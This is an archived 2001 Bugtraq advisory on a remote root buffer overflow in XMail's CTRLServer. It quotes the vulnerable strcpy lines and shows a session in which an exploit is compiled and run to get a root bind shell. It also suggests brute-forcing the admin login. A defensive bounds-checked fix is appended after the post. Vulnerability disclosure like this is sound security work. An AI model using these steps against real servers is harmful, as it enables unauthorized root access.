[18980] in bugtraq


XMail CTRLServer remote buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (isno)
Sat Feb 3 17:15:56 2001

Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====_Dragon105726166357_====="
Message-ID:  <20010202031410.C685D1CD70599@mail.etang.com>
Date:         Fri, 2 Feb 2001 11:06:08 +0800
Reply-To: isno@etang.com
From: isno <isno@etang.com>
To: BUGTRAQ@SECURITYFOCUS.COM


SUMMARY

I discovered that all versions of XMail <http://www.mycio.com/davidel/xmail> have
buffer overflow vulnerabilities in CTRLServer. These holes are NOT the same as the
APOP/USER command buffer overflow vulnerability discovered earlier. This problem
allows a remote attacker to execute arbitrary code by issuing a long
cfgfileget (cfgfileset, domainadd, domaindel) command.

DETAILS

Vulnerable systems:
XMail version 0.66 and prior version

Immune systems:
None

CTRLServer is a tool of XMail for administration purposes. It listens on port 6017 (tunable).
There is some bad programming that leads to vulnerabilities.

In CTRLSvr.cpp
line 1888: CTRLDo_domainadd() function
StrLower(strcpy(szDomain, ppszTokens[1]));

szDomain is a 256-byte local buffer; ppszTokens[1] is parsed from the user input
command, and XMail copies it without bounds checking. It is possible to
overwrite EIP, and because XMail runs as root, an attacker can execute arbitrary code
with root privilege.

The same vulnerabilities exist in CTRLSvr.cpp:
line 1921: CTRLDo_domaindel() function
StrLower(strcpy(szDomain, ppszTokens[1]));

line 2448: CTRLDo_cfgfileget() function
strcpy(szRelativePath, ppszTokens[1]);

line 2523: CTRLDo_cfgfileset() function
strcpy(szRelativePath, ppszTokens[1]);

Before exploiting the vulnerabilities, it is necessary to log in with the CTRLServer
username and password. I think it is easy to get that by brute forcing.

I wrote a program to test the vulnerabilities on my Redhat 6.0 i386 + XMail 0.65
(0.66 has the same bugs):

[root@isno /root]# gcc -o xmailx xmailx.c
[root@isno /root]# ./xmailx isno mypasswd 127.0.0.1

Use retAddress: 0xbc7fe974

+00000 <981016616.25626@127.0.0.1> XMail 0.65 (Linux/Ix86) CTRL Server; Thu, 01 Feb 2001 16:36:56 +0800

Starting to login...
Success!now telnet 127.0.0.1 36864
[root@isno /root]# telnet 127.0.0.1 36864
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
: command not found

Because the buffer is too small to put many NOPs before the shellcode, it is difficult
to guess the return address. And the offset cannot be brute forced, because once overflow
code is sent to the CTRLServer, XMail crashes.

PATCH:
http://www.mycio.com/davidel/xmail should release the patch.

Excuse my poor English...


 isno
 isno@etang.com

Content-Type: application/octet-stream; name="xmailx.c"
Content-Disposition: attachment; filename="xmailx.c"
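As an added illustration (not part of isno's post or of XMail's own source) of the fix the advisory calls for: the unchecked strcpy() pattern beside a length-checked copy for a CTRL "domainadd" argument, assuming the 256-byte szDomain the advisory describes and a hypothetical stand-in for XMail's StrLower().

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* 256 bytes: the size the advisory gives for szDomain in CTRLDo_domainadd(). */
#define DOMAIN_BUF 256

/* Hypothetical stand-in for XMail's StrLower(): lower-case a string in place. */
static char *str_lower(char *s)
{
    for (char *p = s; *p != '\0'; ++p)
        *p = (char)tolower((unsigned char)*p);
    return s;
}

/*
 * Vulnerable pattern quoted in the advisory (do not use):
 *     StrLower(strcpy(szDomain, ppszTokens[1]));
 * Hardened replacement: copy the token only if it and its terminating NUL
 * fit in the destination. Returns 0 on success, -1 if the token is empty
 * or too long; the destination is left untouched on failure.
 */
int ctrl_copy_domain(char *dst, size_t cap, const char *token, size_t len)
{
    if (dst == NULL || token == NULL || len == 0 || len >= cap)
        return -1;
    memcpy(dst, token, len);
    dst[len] = '\0';
    str_lower(dst);
    return 0;
}

/*
 * Minimal "domainadd <domain>" handler: tokenise the command line with
 * strspn/strcspn (no copy of the untrusted line) and hand the argument to
 * the checked copy. Returns 0 on success, -1 on any rejection.
 */
int ctrl_do_domainadd(const char *line, char *dst, size_t cap)
{
    const char *ws = " \t\r\n";
    if (line == NULL)
        return -1;
    const char *cmd = line + strspn(line, ws);      /* skip leading blanks */
    size_t cmd_len = strcspn(cmd, ws);
    if (cmd_len != 9 || strncmp(cmd, "domainadd", 9) != 0)
        return -1;                                  /* not our command */
    const char *arg = cmd + cmd_len;
    arg += strspn(arg, ws);
    size_t arg_len = strcspn(arg, ws);              /* argument length only */
    return ctrl_copy_domain(dst, cap, arg, arg_len);
}
```

A token of 255 bytes is the longest the 256-byte buffer can accept; anything longer is refused instead of being written past the end of the stack frame.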
